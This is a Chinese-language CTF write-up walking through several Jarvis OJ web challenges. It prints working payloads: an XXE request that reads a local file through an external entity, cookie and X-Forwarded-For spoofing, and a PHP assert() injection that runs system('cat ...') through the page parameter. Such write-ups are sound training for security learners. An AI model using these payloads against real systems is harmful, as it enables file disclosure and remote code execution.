WriteUp 中所有内容和知识点均来源于参考资料的师傅们。

API调用 100

URL: http://web.jarvisoj.com:9882/

查看网页源码

Script 脚本部分如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<script>
function XHR() {
var xhr;
try {xhr = new XMLHttpRequest();}
catch(e) {
var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
for (var i=0,len=IEXHRVers.length;i< len;i++) {
try {xhr = new ActiveXObject(IEXHRVers[i]);}
catch(e) {continue;}
}
}
return xhr;
}

function send(){
evil_input = document.getElementById("evil-input").value;
var xhr = XHR();
xhr.open("post","/api/v1.0/try",true);
xhr.onreadystatechange = function () {
if (xhr.readyState==4 && xhr.status==201) {
data = JSON.parse(xhr.responseText); // json格式
tip_area = document.getElementById("tip-area");
tip_area.value = data.task.search+data.task.value;
}
};
xhr.setRequestHeader("Content-Type","application/json");
xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
</script>

上面的js代码,作用就是把我们输入的数据,用json打包发送过去。

XXE

本题的考点就是 XXE 漏洞的利用。
https://www.freebuf.com/articles/web/126788.html
https://security.tencent.com/index.php/blog/msg/69

这道题默认以json 发送数据。
修改 Content-Type

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
content-type
MediaType,即是Internet Media
Type,互联网媒体类型;也叫做MIME类型,在Http协议消息头中,使用Content-Type来表示具体请求中的媒体类型信息。

常见的媒体格式类型如下:
text/html : HTML格式
text/plain :纯文本格式
text/xml : XML格式
image/gif :gif图片格式
image/jpeg :jpg图片格式
image/png:png图片格式
以application开头的媒体格式类型:
application/xhtml+xml :XHTML格式
application/xml : XML数据格式
application/atom+xml :Atom XML聚合格式
application/json : JSON数据格式
application/pdf :pdf格式
application/msword : Word文档格式
application/octet-stream : 二进制流数据(如常见的文档下载)

`

那么,发送数据应该是:

1
2
3
4
5
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY data SYSTEM "file:///home/ctf/flag.txt">
]>
<c>&data;</c>

最终发送数据如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: test/xml
Content-Length: 111
Connection: close
Referer: http://web.jarvisoj.com:9882/

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY data SYSTEM "file:///home/ctf/flag.txt">
]>
<c>&data;</c>

得到回包,包含flag。

1
2
3
4
5
6
7
8
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 38
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Fri, 06 Mar 2020 08:16:53 GMT

<c>CTF{XxE_15_n0T_S7range_Enough}
</c>

admin 100

URL: http://web.jarvisoj.com:32792/
页面只有一个 hello world ,那么扫它的目录。
先发一次包,burp抓到然后右键 send to sprider ,可以扫到一个 robots.txt 文件

1
2
3
robots.txt 文件
参考链接:https://zh.wikipedia.org/wiki/Robots.txt
存放于网站根目录下的ASCII编码的文本文件。

robots.txt文件中有个 admin_s3cr3t.php
访问一下,显示了一个假的flag。抓包,send to R 发现有个admin = 0 的字段,该admin=1得到一个flag。

1
2
3
4
5
6
7
8
9
10
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2020 08:53:19 GMT
Server: Apache/2.4.18 (Unix) OpenSSL/1.0.2h PHP/5.6.21 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.21
Set-Cookie: admin=0
Content-Length: 21
Connection: close
Content-Type: text/html; charset=UTF-8

flag{hello_admin~}

PORT51 100

URL:http://web.jarvisoj.com:32770/
题目让我用51端口去访问。那么到kali下,用命令

1
2
curl --local-port 51  http://web.jarvisoj.com:32770/
PCTF{M45t3r_oF_CuRl}

参考链接:
https://www.cnblogs.com/duhuo/p/5695256.html

LOCALHOST 150

URL: http://web.jarvisoj.com:32774/

题目说要localhost,意思也就是说要本地访问。
那么http头中 X-Forwarded-For 可以指出当前的客户IP。

参考链接:
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/X-Forwarded-For
https://www.jianshu.com/p/792048d08ebc

发送

1
2
3
4
5
GET / HTTP/1.1
Host: web.jarvisoj.com:32774
X-Forwarded-For:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101
...

得到

1
2
3
4
<body>
<h3>Yeah!! Here's your flag:PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}</h3>
</body>
</html>

WEB? 150

URL:http://web.jarvisoj.com:9891/

题目让输入密码,也就是找密码了。输入错误,则返回Wrong Password!!
查看源码,可以看到有个可疑的app.js,里面代码居多。直接搜索 Wrong Password!!
找到关键的函数,仔细看就是加密的部分。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
value:function(e){
if(25!==e.length)
return!1;
for(var t=[],n=0;n<25;n++)
t.push(e.charCodeAt(n));
for(var r=[325799, ... ],
o=[[11, ...],
...],n=0;n<25;n++)
{
for(var i=0,a=0;a<25;a++)
i+=t[a]*o[n][a];
if(i!==r[n])
return!1
}
return!0
},}
o 多维数组,r 是一维
相当于解线性方程 b = x*a; x = b/a;
r[n] = t[a]*o[n][a];
t[a] = r[n] / o[n][a];

python 提供了解线性方程的方法:
https://blog.csdn.net/HackerTom/article/details/98519196
https://zhuanlan.zhihu.com/p/24893371
脚本如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# utf-8
# python-3
import numpy
r = numpy.array([325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259])
o=numpy.array([[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],
[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],
[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],
[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],
[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],
[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],
[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],
[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],
[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],
[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],
[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],
[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],
[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],
[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],
[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],
[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],
[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],
[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],
[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],
[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],
[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],
[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],
[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],
[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],
[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]])
x = numpy.linalg.solve(o, r) # 解出的 x 是浮点数,
flag=''
for i in x:
flag+= chr(int(round(i))) # round() 方法返回浮点数 x 的四舍五入值。
print(flag)
print(x)

QWB{R3ac7_1s_interesting}

babyphp 200

题目是个网站,用burpsuite扫一下目录,看到有个flag页面,但是被注释了。
根据人家wp,说这个是git信息泄露。用 githack 可以down下代码。

1
2
参考:https://github.com/lijiejie/GitHack
python GitHack.py http://web.jarvisoj.com:32798/.git/

下载后,查看 index.php,发现参数 home 可以注入。

1
2
3
4
5
6
7
8
9
10
源码如下:
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}

$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");

其中assert是个危险函数,其原型为

1
bool assert ( mixed $assertion [, string $description ] )

如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。
php注入参考

使用

1
?page=flag'.system("cat templates/flag.php;").'

页面返回 That file doesn’t exist!
查看源码得到flag。